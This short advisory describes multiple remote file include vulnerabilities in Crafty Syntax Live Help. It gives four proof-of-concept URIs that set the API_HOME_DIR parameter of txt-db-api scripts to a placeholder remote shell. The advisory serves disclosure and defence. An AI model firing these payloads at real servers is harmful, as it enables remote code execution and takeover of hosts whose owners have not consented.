Crafty Syntax Live Help Multiple Remote File Include Vulnerabilities

Crafty Syntax Live Help Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?